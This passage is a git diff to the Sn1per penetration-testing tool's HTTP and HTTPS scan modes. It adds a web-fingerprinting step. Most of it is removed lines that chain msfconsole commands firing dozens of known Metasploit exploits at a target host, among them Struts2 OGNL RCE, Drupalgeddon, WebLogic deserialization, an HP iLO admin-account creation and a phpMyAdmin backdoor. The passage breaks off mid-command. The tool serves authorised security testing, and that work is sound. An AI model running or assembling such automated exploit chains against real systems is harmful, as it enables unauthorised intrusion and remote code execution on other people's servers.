"s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw 2> /dev/null \ No newline at end of file diff --git a/modes/webporthttp.sh b/modes/webporthttp.sh index a3729582..ae88dc9f 100644 --- a/modes/webporthttp.sh +++ b/modes/webporthttp.sh @@ -14,8 +14,8 @@ if [ "$MODE" = "webporthttp" ]; then mkdir $LOOT_DIR/scans 2> /dev/null mkdir $LOOT_DIR/output 2> /dev/null fi - echo "sniper -t $TARGET -m $MODE -p $PORT --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE-$PORT-`date +%Y%m%d%H%M`.txt - sniper -t $TARGET -m $MODE -p $PORT --noreport $args | tee $LOOT_DIR/output/sniper-$MODE-$PORT-`date +%Y%m%d%H%M`.txt 2>&1 + echo "sniper -t $TARGET -m $MODE -p $PORT --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt + sniper -t $TARGET -m $MODE -p $PORT --noreport $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-$PORT-`date +%Y%m%d%H%M`.txt 2>&1 exit fi echo -e "$OKRED ____ $RESET" @@ -26,7 +26,7 @@ if [ "$MODE" = "webporthttp" ]; then echo -e "$OKRED /_/ $RESET" echo -e "$RESET" echo -e "$OKORANGE + -- --=[https://xerosecurity.com" - echo -e "$OKORANGE + -- --=[Sn1per v$VER by 1N3" + echo -e "$OKORANGE + -- --=[Sn1per v$VER by @xer0dayz" echo -e "" echo -e "" echo -e " ; , " @@ -101,6 +101,12 @@ if [ "$MODE" = "webporthttp" ]; then wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 http://$TARGET:$PORT | perl -l -0777 -ne 'print $1 if /\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-http-$TARGET-$PORT.txt 2> /dev/null curl --connect-timeout 3 -I -s -R http://$TARGET:$PORT | tee $LOOT_DIR/web/headers-http-$TARGET-$PORT.txt 2> /dev/null curl --connect-timeout 5 -I -s -R -L http://$TARGET:$PORT | tee $LOOT_DIR/web/websource-http-$TARGET-$PORT.txt 2> /dev/null + if [ "$WEBTECH" = "1" ]; then + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED GATHERING WEB FINGERPRINT $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + webtech -u http://$TARGET:$PORT | grep \- | cut -d- -f2- | tee $LOOT_DIR/web/webtech-$TARGET-http-port$PORT.txt + fi echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED DISPLAYING META GENERATOR TAGS $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" @@ -236,165 +242,8 @@ if [ "$MODE" = "webporthttp" ]; then cd $INSTALL_DIR fi if [ $METASPLOIT_EXPLOIT = "1" ]; then - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING HTTP PUT UPLOAD SCANNER $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use scanner/http/http_put; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL false; run; set PATH /uploads/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL false; run; use scanner/http/webdav_website_content; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING MICROSOFT IIS WEBDAV ScStoragePathFromUrl OVERFLOW $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/windows/iis/iis_webdav_scstoragepathfromurl; setg RHOST "$TARGET"; setg RPORT "$PORT"; setg SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-hp_ilo_create_admin_account.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-hp_ilo_create_admin_account.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-hp_ilo_create_admin_account.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-hp_ilo_create_admin_account.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING ELASTICSEARCH DYNAMIC SCRIPT JAVA INJECTION EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/elasticsearch/script_mvel_rce; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING DRUPALGEDDON HTTP PARAMETER SQL INJECTION CVE-2014-3704 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/drupal_drupageddon; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw 2> /dev/null - - - - - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING GLASSFISH ADMIN TRAVERSAL EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use scanner/http/glassfish_traversal; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.raw 2> /dev/null - - - - - - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set WAIT 2; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/windows/http/badblue_passthru; setg RHOST "$TARGET"; set RPORT 80; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-badblue_passthru.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-badblue_passthru.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-badblue_passthru.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-badblue_passthru.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST "$TARGET"; set RPORT 80; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOITS $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/htp/phpmyadmin_preg_replace; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT CVE-2017-8917 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST "$TARGET"; set RPORT 80; set SSL false; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING WORDPRESS REST API CONTENT INJECTION CVE-2017-5612 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use auxiliary/scanner/http/wordpress_content_injection; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT 80; set SSL false; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING ORACLE WEBLOGIC WLS-WSAT DESERIALIZATION RCE CVE-2017-10271 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce; setg RHOST "$TARGET"; set RPORT 80; set SSL false; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING APACHE STRUTS JAKARTA OGNL INJECTION CVE-2017-5638 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use multi/http/struts2_content_type_ognl; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING APACHE STRUTS 2 SHOWCASE OGNL RCE CVE-2017-9805 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/struts2_rest_xstream; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING APACHE STRUTS 2 REST XSTREAM RCE CVE-2017-9791 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/struts2_code_exec_showcase; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING APACHE TOMCAT CVE-2017-12617 RCE EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/tomcat_jsp_upload_bypass; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING APACHE STRUTS 2 NAMESPACE REDIRECT OGNL INJECTION CVE-2018-11776 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/struts2_namespace_ognl; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED CISCO ASA TRAVERSAL CVE-2018-0296 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use auxiliary/scanner/http/cisco_directory_traversal; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING DRUPALGEDDON2 CVE-2018-7600 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/unix/webapp/drupal_drupalgeddon2; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING ORACLE WEBLOGIC SERVER DESERIALIZATION RCE CVE-2018-2628 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/misc/weblogic_deserialize; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING OSCOMMERCE INSTALLER RCE CVE-2018-2628 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/oscommerce_installer_unauth_code_exec; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw 2> /dev/null + SSL="false" + source modes/web_autopwn.sh fi source modes/osint_stage_2.sh fi diff --git a/modes/webporthttps.sh b/modes/webporthttps.sh index 2f9f64c3..1f46810d 100644 --- a/modes/webporthttps.sh +++ b/modes/webporthttps.sh @@ -14,8 +14,8 @@ if [ "$MODE" = "webporthttps" ]; then mkdir $LOOT_DIR/scans 2> /dev/null mkdir $LOOT_DIR/output 2> /dev/null fi - echo "sniper -t $TARGET -m $MODE -p $PORT --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE-$PORT-`date +%Y%m%d%H%M`.txt - sniper -t $TARGET -m $MODE -p $PORT --noreport $args | tee $LOOT_DIR/output/sniper-$MODE-$PORT-`date +%Y%m%d%H%M`.txt 2>&1 + echo "sniper -t $TARGET -m $MODE -p $PORT --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt + sniper -t $TARGET -m $MODE -p $PORT --noreport $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-$PORT-`date +%Y%m%d%H%M`.txt 2>&1 exit fi echo -e "$OKRED ____ $RESET" @@ -26,7 +26,7 @@ if [ "$MODE" = "webporthttps" ]; then echo -e "$OKRED /_/ $RESET" echo -e "$RESET" echo -e "$OKORANGE + -- --=[https://xerosecurity.com" - echo -e "$OKORANGE + -- --=[Sn1per v$VER by 1N3" + echo -e "$OKORANGE + -- --=[Sn1per v$VER by @xer0dayz" echo -e "" echo -e "" echo -e " ; , " @@ -66,7 +66,7 @@ if [ "$MODE" = "webporthttps" ]; then echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING TCP PORT SCAN $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - nmap -sV -T5 -Pn -p $PORT --open $TARGET -oX $LOOT_DIR/nmap/nmap-https-$TARGET.xml + nmap -sV -Pn -p $PORT --open $TARGET -oX $LOOT_DIR/nmap/nmap-https-$TARGET.xml port_https=`grep 'portid="'$PORT'"' $LOOT_DIR/nmap/nmap-https-$TARGET.xml | grep open` if [ -z "$port_https" ]; then @@ -102,6 +102,12 @@ if [ "$MODE" = "webporthttps" ]; then wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 https://$TARGET:$PORT | perl -l -0777 -ne 'print $1 if /\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-https-$TARGET-$PORT.txt 2> /dev/null curl --connect-timeout 5 -I -s -R https://$TARGET:$PORT | tee $LOOT_DIR/web/headers-https-$TARGET-$PORT.txt 2> /dev/null curl --connect-timeout 5 -I -s -R -L https://$TARGET:$PORT | tee $LOOT_DIR/web/websource-https-$TARGET-$PORT.txt 2> /dev/null + if [ "$WEBTECH" = "1" ]; then + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED GATHERING WEB FINGERPRINT $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + webtech -u https://$TARGET:$PORT | grep \- | cut -d- -f2- | tee $LOOT_DIR/web/webtech-$TARGET-https-port$PORT.txt + fi echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED DISPLAYING META GENERATOR TAGS $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" @@ -239,166 +245,8 @@ if [ "$MODE" = "webporthttps" ]; then fi cd $INSTALL_DIR if [ "$METASPLOIT_EXPLOIT" == "1" ]; then - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING HTTP PUT UPLOAD SCANNER $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use scanner/http/http_put; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL true; setg SSL false; run; set PATH /uploads/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL true; setg SSL false; run; use scanner/http/webdav_website_content; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING MICROSOFT IIS WEBDAV ScStoragePathFromUrl OVERFLOW $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/windows/iis/iis_webdav_scstoragepathfromurl; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; setg SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL true; set SSL false; run; exit;" | tee 